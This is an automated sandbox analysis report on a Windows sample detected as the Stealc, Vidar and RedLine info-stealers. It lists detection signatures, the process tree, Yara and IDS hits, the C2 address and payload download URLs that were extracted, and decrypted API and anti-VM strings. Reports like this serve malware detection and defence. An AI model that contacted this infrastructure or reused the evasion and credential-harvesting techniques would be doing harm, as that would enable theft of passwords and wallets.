Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TNQTc6Qmkg.exe

Overview

General Information

Sample name:TNQTc6Qmkg.exe
renamed because original name is a hash value
Original sample name:fcac04fb67b3dec2db923867c5cb0701.exe
Analysis ID:1432428
MD5:fcac04fb67b3dec2db923867c5cb0701
SHA1:56af848d85c781fd6ac0b8e11b2aec770fc4a105
SHA256:df620b823687fa8371cb9e5a0dc17c483d804ef601757968b8666de2608d8ebb
Tags:32exeStealc
Infos:

Detection

Mars Stealer, RedLine, SectopRAT, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected RedLine Stealer
Yara detected SectopRAT
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • TNQTc6Qmkg.exe (PID: 4312 cmdline: "C:\Users\user\Desktop\TNQTc6Qmkg.exe" MD5: FCAC04FB67B3DEC2DB923867C5CB0701)
    • u3bs.0.exe (PID: 6808 cmdline: "C:\Users\user\AppData\Local\Temp\u3bs.0.exe" MD5: BB2810421305B969836433A1DFB11271)
      • cmd.exe (PID: 6240 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • HDBKJEGIEB.exe (PID: 3004 cmdline: "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)
      • WerFault.exe (PID: 280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2360 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • run.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
      • cmd.exe (PID: 6252 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSBuild.exe (PID: 6164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • u3bs.3.exe (PID: 3156 cmdline: "C:\Users\user\AppData\Local\Temp\u3bs.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
    • WerFault.exe (PID: 2256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • chrome.exe (PID: 1816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://923204732243015979198396844819192998461207207524972816830460816/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • run.exe (PID: 6612 cmdline: "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
    • cmd.exe (PID: 6176 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}
{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\bxhlahunbhcJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\bxhlahunbhcJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\bxhlahunbhcMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
        • 0xb864a:$s14: keybd_event
        • 0xbf3b9:$v1_1: grabber@
        • 0xb921c:$v1_2: <BrowserProfile>k__
        • 0xb9c95:$v1_3: <SystemHardwares>k__
        • 0xb9d54:$v1_5: <ScannedWallets>k__
        • 0xb9de4:$v1_6: <DicrFiles>k__
        • 0xb9dc0:$v1_7: <MessageClientFiles>k__
        • 0xba18a:$v1_8: <ScanBrowsers>k__BackingField
        • 0xba1dc:$v1_8: <ScanWallets>k__BackingField
        • 0xba1f9:$v1_8: <ScanScreen>k__BackingField
        • 0xba233:$v1_8: <ScanVPN>k__BackingField
        • 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
        • 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
        C:\Users\user\AppData\Local\Temp\osssciedmedJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          C:\Users\user\AppData\Local\Temp\osssciedmedJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0000001B.00000002.2968147762.0000000001427000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
                  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
                  00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    Click to see the 34 entries
                    SourceRuleDescriptionAuthorStrings
                    1.3.u3bs.0.exe.42d0000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      1.3.u3bs.0.exe.42d0000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                        14.2.cmd.exe.5d800c8.7.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          1.2.u3bs.0.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                            1.2.u3bs.0.exe.400000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                              Click to see the 46 entries
                              No Sigma rule has matched
                              Timestamp:04/27/24-02:18:57.298293
                              SID:2856233
                              Source Port:49730
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-02:19:03.852745
                              SID:2051831
                              Source Port:80
                              Destination Port:49733
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-02:19:02.778873
                              SID:2044243
                              Source Port:49733
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-02:19:03.279794
                              SID:2044244
                              Source Port:49733
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-02:19:03.561564
                              SID:2051828
                              Source Port:80
                              Destination Port:49733
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-02:19:03.564460
                              SID:2044246
                              Source Port:49733
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: http://185.172.128.203/tiktok.exeAvira URL Cloud: Label: malware
                              Source: http://185.172.128.228/ping.php?substr=eightAvira URL Cloud: Label: malware
                              Source: http://185.172.128.59/syncUpd.exeAvira URL Cloud: Label: malware
                              Source: http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0Avira URL Cloud: Label: malware
                              Source: C:\Users\user\AppData\Local\Temp\osssciedmedAvira: detection malicious, Label: HEUR/AGEN.1307453
                              Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhcAvira: detection malicious, Label: HEUR/AGEN.1307453
                              Source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
                              Source: u3bs.0.exe.6808.1.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}
                              Source: http://185.172.128.228/BroomSetup.exeVirustotal: Detection: 22%Perma Link
                              Source: 185.172.128.76/3cd2b41cbde8fc9c.phpVirustotal: Detection: 16%Perma Link
                              Source: http://185.172.128.228/ping.php?substr=eightVirustotal: Detection: 18%Perma Link
                              Source: http://185.172.128.203/tiktok.exeVirustotal: Detection: 19%Perma Link
                              Source: http://185.172.128.76/15f649199f40275b/sqlite3.dll#Virustotal: Detection: 8%Perma Link
                              Source: http://185.172.128.203/tiktok.exe00Virustotal: Detection: 15%Perma Link
                              Source: http://185.172.128.76/15f649199f40275b/sqlite3.dllVirustotal: Detection: 8%Perma Link
                              Source: http://185.172.128.76/3cd2b41cbde8fc9c.phpVirustotal: Detection: 16%Perma Link
                              Source: http://185.172.128.76/15f649199f40275b/msvcp140.dllQVirustotal: Detection: 6%Perma Link
                              Source: http://185.172.128.59/syncUpd.exeVirustotal: Detection: 22%Perma Link
                              Source: http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0Virustotal: Detection: 20%Perma Link
                              Source: http://185.172.128.203/tiktok.exet-Disposition:Virustotal: Detection: 15%Perma Link
                              Source: http://185.172.128.76Virustotal: Detection: 14%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeVirustotal: Detection: 72%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exeVirustotal: Detection: 72%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhcReversingLabs: Detection: 64%
                              Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhcVirustotal: Detection: 60%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\osssciedmedReversingLabs: Detection: 64%
                              Source: C:\Users\user\AppData\Local\Temp\osssciedmedVirustotal: Detection: 60%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeVirustotal: Detection: 39%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dllVirustotal: Detection: 12%Perma Link
                              Source: TNQTc6Qmkg.exeReversingLabs: Detection: 47%
                              Source: TNQTc6Qmkg.exeVirustotal: Detection: 44%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\osssciedmedJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhcJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeJoe Sandbox ML: detected
                              Source: TNQTc6Qmkg.exeJoe Sandbox ML: detected
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: INSERT_KEY_HERE
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetProcAddress
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: LoadLibraryA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: lstrcatA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: OpenEventA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CreateEventA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CloseHandle
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Sleep
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetUserDefaultLangID
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: VirtualAllocExNuma
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: VirtualFree
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetSystemInfo
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: VirtualAlloc
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: HeapAlloc
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetComputerNameA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: lstrcpyA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetProcessHeap
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetCurrentProcess
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: lstrlenA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ExitProcess
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GlobalMemoryStatusEx
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetSystemTime
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SystemTimeToFileTime
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: advapi32.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: gdi32.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: user32.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: crypt32.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ntdll.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetUserNameA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CreateDCA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetDeviceCaps
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ReleaseDC
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CryptStringToBinaryA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sscanf
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: VMwareVMware
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: HAL9TH
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: JohnDoe
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: DISPLAY
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %hu/%hu/%hu
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: http://185.172.128.76
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: /3cd2b41cbde8fc9c.php
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: /15f649199f40275b/
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: default10
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetEnvironmentVariableA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetFileAttributesA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GlobalLock
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: HeapFree
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetFileSize
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GlobalSize
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CreateToolhelp32Snapshot
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: IsWow64Process
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Process32Next
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetLocalTime
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: FreeLibrary
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetTimeZoneInformation
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetSystemPowerStatus
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetVolumeInformationA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetWindowsDirectoryA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Process32First
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetLocaleInfoA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetUserDefaultLocaleName
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetModuleFileNameA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: DeleteFileA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: FindNextFileA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: LocalFree
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: FindClose
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SetEnvironmentVariableA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: LocalAlloc
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetFileSizeEx
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ReadFile
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SetFilePointer
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: WriteFile
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CreateFileA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: FindFirstFileA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CopyFileA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: VirtualProtect
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetLastError
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: lstrcpynA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: MultiByteToWideChar
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GlobalFree
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: WideCharToMultiByte
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GlobalAlloc
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: OpenProcess
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: TerminateProcess
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetCurrentProcessId
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: gdiplus.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ole32.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: bcrypt.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: wininet.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: shlwapi.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: shell32.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: psapi.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: rstrtmgr.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CreateCompatibleBitmap
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SelectObject
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: BitBlt
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: DeleteObject
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CreateCompatibleDC
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GdipGetImageEncodersSize
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GdipGetImageEncoders
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GdiplusStartup
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GdiplusShutdown
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GdipSaveImageToStream
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GdipDisposeImage
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GdipFree
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetHGlobalFromStream
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CreateStreamOnHGlobal
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CoUninitialize
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CoInitialize
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CoCreateInstance
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: BCryptDecrypt
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: BCryptSetProperty
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: BCryptDestroyKey
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetWindowRect
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetDesktopWindow
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetDC
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CloseWindow
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: wsprintfA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: EnumDisplayDevicesA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetKeyboardLayoutList
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CharToOemW
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: wsprintfW
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RegQueryValueExA
